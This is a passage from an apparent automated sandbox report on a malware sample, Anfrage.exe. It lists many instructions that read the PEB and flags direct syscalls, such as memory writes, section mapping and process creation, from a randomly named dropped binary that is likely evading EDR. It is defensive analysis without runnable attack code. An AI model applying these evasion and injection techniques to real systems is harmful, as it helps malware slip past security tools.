            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C5096 mov eax, dword ptr fs:[00000030h]7_2_363C5096
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363ED090 mov eax, dword ptr fs:[00000030h]7_2_363ED090
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363ED090 mov eax, dword ptr fs:[00000030h]7_2_363ED090
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BD08D mov eax, dword ptr fs:[00000030h]7_2_363BD08D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644D080 mov eax, dword ptr fs:[00000030h]7_2_3644D080
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644D080 mov eax, dword ptr fs:[00000030h]7_2_3644D080
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E50E4 mov eax, dword ptr fs:[00000030h]7_2_363E50E4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E50E4 mov ecx, dword ptr fs:[00000030h]7_2_363E50E4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E90DB mov eax, dword ptr fs:[00000030h]7_2_363E90DB
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov ecx, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov ecx, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov ecx, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov ecx, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36453140 mov eax, dword ptr fs:[00000030h]7_2_36453140
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36453140 mov eax, dword ptr fs:[00000030h]7_2_36453140
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36453140 mov eax, dword ptr fs:[00000030h]7_2_36453140
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB136 mov eax, dword ptr fs:[00000030h]7_2_363BB136
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB136 mov eax, dword ptr fs:[00000030h]7_2_363BB136
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB136 mov eax, dword ptr fs:[00000030h]7_2_363BB136
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB136 mov eax, dword ptr fs:[00000030h]7_2_363BB136
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1131 mov eax, dword ptr fs:[00000030h]7_2_363C1131
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1131 mov eax, dword ptr fs:[00000030h]7_2_363C1131
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495152 mov eax, dword ptr fs:[00000030h]7_2_36495152
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36459179 mov eax, dword ptr fs:[00000030h]7_2_36459179
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36497120 mov eax, dword ptr fs:[00000030h]7_2_36497120
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C7152 mov eax, dword ptr fs:[00000030h]7_2_363C7152
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9148 mov eax, dword ptr fs:[00000030h]7_2_363B9148
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9148 mov eax, dword ptr fs:[00000030h]7_2_363B9148
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9148 mov eax, dword ptr fs:[00000030h]7_2_363B9148
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9148 mov eax, dword ptr fs:[00000030h]7_2_363B9148
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364951CB mov eax, dword ptr fs:[00000030h]7_2_364951CB
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DB1B0 mov eax, dword ptr fs:[00000030h]7_2_363DB1B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364931E1 mov eax, dword ptr fs:[00000030h]7_2_364931E1
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364671F9 mov esi, dword ptr fs:[00000030h]7_2_364671F9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36475180 mov eax, dword ptr fs:[00000030h]7_2_36475180
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36475180 mov eax, dword ptr fs:[00000030h]7_2_36475180
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C51ED mov eax, dword ptr fs:[00000030h]7_2_363C51ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36417190 mov eax, dword ptr fs:[00000030h]7_2_36417190
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364711A4 mov eax, dword ptr fs:[00000030h]7_2_364711A4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364711A4 mov eax, dword ptr fs:[00000030h]7_2_364711A4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364711A4 mov eax, dword ptr fs:[00000030h]7_2_364711A4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364711A4 mov eax, dword ptr fs:[00000030h]7_2_364711A4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FD1D0 mov eax, dword ptr fs:[00000030h]7_2_363FD1D0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FD1D0 mov ecx, dword ptr fs:[00000030h]7_2_363FD1D0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647DE46 mov eax, dword ptr fs:[00000030h]7_2_3647DE46
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1E30 mov eax, dword ptr fs:[00000030h]7_2_363C1E30
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1E30 mov eax, dword ptr fs:[00000030h]7_2_363C1E30
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DDE2D mov eax, dword ptr fs:[00000030h]7_2_363DDE2D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DDE2D mov eax, dword ptr fs:[00000030h]7_2_363DDE2D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DDE2D mov eax, dword ptr fs:[00000030h]7_2_363DDE2D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36469E56 mov ecx, dword ptr fs:[00000030h]7_2_36469E56
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FBE17 mov eax, dword ptr fs:[00000030h]7_2_363FBE17
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BDE10 mov eax, dword ptr fs:[00000030h]7_2_363BDE10
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BBE78 mov ecx, dword ptr fs:[00000030h]7_2_363BBE78
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36493E10 mov eax, dword ptr fs:[00000030h]7_2_36493E10
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36493E10 mov eax, dword ptr fs:[00000030h]7_2_36493E10
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FBE51 mov eax, dword ptr fs:[00000030h]7_2_363FBE51
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FBE51 mov eax, dword ptr fs:[00000030h]7_2_363FBE51
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D5E40 mov eax, dword ptr fs:[00000030h]7_2_363D5E40
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495E37 mov eax, dword ptr fs:[00000030h]7_2_36495E37
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495E37 mov eax, dword ptr fs:[00000030h]7_2_36495E37
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495E37 mov eax, dword ptr fs:[00000030h]7_2_36495E37
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644FEC5 mov eax, dword ptr fs:[00000030h]7_2_3644FEC5
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36479EDF mov eax, dword ptr fs:[00000030h]7_2_36479EDF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36479EDF mov eax, dword ptr fs:[00000030h]7_2_36479EDF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BFEA0 mov eax, dword ptr fs:[00000030h]7_2_363BFEA0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BDEA5 mov eax, dword ptr fs:[00000030h]7_2_363BDEA5
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BDEA5 mov ecx, dword ptr fs:[00000030h]7_2_363BDEA5
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C7E96 mov eax, dword ptr fs:[00000030h]7_2_363C7E96
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648BEE6 mov eax, dword ptr fs:[00000030h]7_2_3648BEE6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648BEE6 mov eax, dword ptr fs:[00000030h]7_2_3648BEE6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648BEE6 mov eax, dword ptr fs:[00000030h]7_2_3648BEE6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648BEE6 mov eax, dword ptr fs:[00000030h]7_2_3648BEE6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F3E8F mov eax, dword ptr fs:[00000030h]7_2_363F3E8F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C3EF4 mov eax, dword ptr fs:[00000030h]7_2_363C3EF4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C3EF4 mov eax, dword ptr fs:[00000030h]7_2_363C3EF4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C3EF4 mov eax, dword ptr fs:[00000030h]7_2_363C3EF4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F3EEB mov ecx, dword ptr fs:[00000030h]7_2_363F3EEB
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F3EEB mov eax, dword ptr fs:[00000030h]7_2_363F3EEB
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F3EEB mov eax, dword ptr fs:[00000030h]7_2_363F3EEB
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C3EE1 mov eax, dword ptr fs:[00000030h]7_2_363C3EE1
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644DE9B mov eax, dword ptr fs:[00000030h]7_2_3644DE9B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644DEAA mov eax, dword ptr fs:[00000030h]7_2_3644DEAA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646DEB0 mov eax, dword ptr fs:[00000030h]7_2_3646DEB0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646DEB0 mov ecx, dword ptr fs:[00000030h]7_2_3646DEB0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646DEB0 mov eax, dword ptr fs:[00000030h]7_2_3646DEB0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646DEB0 mov eax, dword ptr fs:[00000030h]7_2_3646DEB0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646DEB0 mov eax, dword ptr fs:[00000030h]7_2_3646DEB0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647DEB0 mov eax, dword ptr fs:[00000030h]7_2_3647DEB0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BBEC0 mov eax, dword ptr fs:[00000030h]7_2_363BBEC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BBEC0 mov eax, dword ptr fs:[00000030h]7_2_363BBEC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]7_2_363CBEC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]7_2_363CBEC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]7_2_363CBEC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]7_2_363CBEC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]7_2_363CBEC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]7_2_363CBEC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]7_2_363CBEC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]7_2_363CBEC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EFEC0 mov eax, dword ptr fs:[00000030h]7_2_363EFEC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3643FF42 mov eax, dword ptr fs:[00000030h]7_2_3643FF42
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644DF10 mov eax, dword ptr fs:[00000030h]7_2_3644DF10
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36441F13 mov eax, dword ptr fs:[00000030h]7_2_36441F13
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EBF60 mov eax, dword ptr fs:[00000030h]7_2_363EBF60
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647DF2F mov eax, dword ptr fs:[00000030h]7_2_3647DF2F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1F50 mov eax, dword ptr fs:[00000030h]7_2_363C1F50
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F7F51 mov eax, dword ptr fs:[00000030h]7_2_363F7F51
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36467F3E mov eax, dword ptr fs:[00000030h]7_2_36467F3E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647BFC0 mov ecx, dword ptr fs:[00000030h]7_2_3647BFC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647BFC0 mov eax, dword ptr fs:[00000030h]7_2_3647BFC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36493FC0 mov eax, dword ptr fs:[00000030h]7_2_36493FC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FBFB0 mov eax, dword ptr fs:[00000030h]7_2_363FBFB0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36443FD7 mov eax, dword ptr fs:[00000030h]7_2_36443FD7
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BFF90 mov edi, dword ptr fs:[00000030h]7_2_363BFF90
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]7_2_363D1F92
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]7_2_363D1F92
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1F92 mov eax, dword ptr fs:[00000030h]7_2_363D1F92
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]7_2_363D1F92
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]7_2_363D1F92
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1F92 mov eax, dword ptr fs:[00000030h]7_2_363D1F92
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]7_2_363D1F92
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]7_2_363D1F92
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1F92 mov eax, dword ptr fs:[00000030h]7_2_363D1F92
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]7_2_363D1F92
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]7_2_363D1F92

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
